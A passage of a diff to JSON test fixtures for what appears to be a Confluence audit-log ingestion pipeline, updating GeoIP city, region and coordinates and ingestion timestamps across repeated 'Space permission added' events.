added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"REMOVEBLOG\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":491000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -3849,20 +3615,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -3870,7 +3630,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:09:09.045191158Z", + "ingested": "2021-12-14T14:34:52.859166044Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-administrators\",\"name\":\"confluence-administrators\",\"type\":\"Group\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Group\",\"key\":\"Group\",\"to\":\"confluence-administrators\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"CREATEATTACHMENT\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":493000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -3951,20 +3711,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -3972,7 +3726,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:09:09.045192835Z", + "ingested": "2021-12-14T14:34:52.859166423Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-users\",\"name\":\"confluence-users\",\"type\":\"Group\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Group\",\"key\":\"Group\",\"to\":\"confluence-users\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"CREATEATTACHMENT\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":496000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -4047,20 +3801,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -4068,7 +3816,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:09:09.045194512Z", + "ingested": "2021-12-14T14:34:52.859166787Z", "original": "{\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"CREATEATTACHMENT\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":498000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -4149,20 +3897,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -4170,7 +3912,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:09:09.045196189Z", + "ingested": "2021-12-14T14:34:52.859167153Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-administrators\",\"name\":\"confluence-administrators\",\"type\":\"Group\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Group\",\"key\":\"Group\",\"to\":\"confluence-administrators\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"REMOVEATTACHMENT\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":501000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -4251,20 +3993,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -4272,7 +4008,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:09:09.045197884Z", + "ingested": "2021-12-14T14:34:52.859167513Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-users\",\"name\":\"confluence-users\",\"type\":\"Group\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Group\",\"key\":\"Group\",\"to\":\"confluence-users\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"REMOVEATTACHMENT\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":503000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -4347,20 +4083,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -4368,7 +4098,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:09:09.045199577Z", + "ingested": "2021-12-14T14:34:52.859167875Z", "original": "{\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"REMOVEATTACHMENT\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":506000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -4449,20 +4179,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -4470,7 +4194,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:09:09.045201269Z", + "ingested": "2021-12-14T14:34:52.859168229Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-administrators\",\"name\":\"confluence-administrators\",\"type\":\"Group\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Group\",\"key\":\"Group\",\"to\":\"confluence-administrators\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"EDITBLOG\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":508000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -4551,20 +4275,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -4572,7 +4290,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:09:09.045202943Z", + "ingested": "2021-12-14T14:34:52.859168709Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-users\",\"name\":\"confluence-users\",\"type\":\"Group\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Group\",\"key\":\"Group\",\"to\":\"confluence-users\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"EDITBLOG\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":510000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -4647,20 +4365,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -4668,7 +4380,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:09:09.045204629Z", + "ingested": "2021-12-14T14:34:52.859169063Z", "original": "{\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"EDITBLOG\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":513000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -4749,20 +4461,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -4770,7 +4476,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:09:09.045206337Z", + "ingested": "2021-12-14T14:34:52.859169431Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-administrators\",\"name\":\"confluence-administrators\",\"type\":\"Group\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Group\",\"key\":\"Group\",\"to\":\"confluence-administrators\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"EXPORTSPACE\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":515000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -4851,20 +4557,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -4872,7 +4572,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:09:09.045208017Z", + "ingested": "2021-12-14T14:34:52.859169785Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-users\",\"name\":\"confluence-users\",\"type\":\"Group\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Group\",\"key\":\"Group\",\"to\":\"confluence-users\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"EXPORTSPACE\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":518000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -4947,20 +4647,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -4968,7 +4662,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:09:09.045209768Z", + "ingested": "2021-12-14T14:34:52.859170276Z", "original": "{\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"EXPORTSPACE\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":520000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -5049,20 +4743,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -5070,7 +4758,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:09:09.045211452Z", + "ingested": "2021-12-14T14:34:52.859170630Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-administrators\",\"name\":\"confluence-administrators\",\"type\":\"Group\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Group\",\"key\":\"Group\",\"to\":\"confluence-administrators\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"REMOVEMAIL\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":522000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -5151,20 +4839,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -5172,7 +4854,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:09:09.045213116Z", + "ingested": "2021-12-14T14:34:52.859170984Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-users\",\"name\":\"confluence-users\",\"type\":\"Group\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Group\",\"key\":\"Group\",\"to\":\"confluence-users\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"REMOVEMAIL\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":525000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -5247,20 +4929,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -5268,7 +4944,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:09:09.045214798Z", + "ingested": "2021-12-14T14:34:52.859171356Z", "original": "{\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"REMOVEMAIL\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":527000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -5349,20 +5025,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -5370,7 +5040,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:09:09.045216596Z", + "ingested": "2021-12-14T14:34:52.859171779Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-administrators\",\"name\":\"confluence-administrators\",\"type\":\"Group\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Group\",\"key\":\"Group\",\"to\":\"confluence-administrators\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"SETPAGEPERMISSIONS\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":529000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -5451,20 +5121,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -5472,7 +5136,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:09:09.045218276Z", + "ingested": "2021-12-14T14:34:52.859172218Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-users\",\"name\":\"confluence-users\",\"type\":\"Group\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Group\",\"key\":\"Group\",\"to\":\"confluence-users\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"SETPAGEPERMISSIONS\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":532000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -5493,6 +5157,7 @@ ] }, { + "@timestamp": "2021-11-22T23:43:22.615Z", "confluence": { "audit": { "method": "System", @@ -5513,7 +5178,6 @@ ] } }, - "@timestamp": "2021-11-22T23:43:22.615Z", "ecs": { "version": "1.12.0" }, @@ -5527,7 +5191,7 @@ }, "event": { "action": "atlassian.audit.event.action.audit.config.updated", - 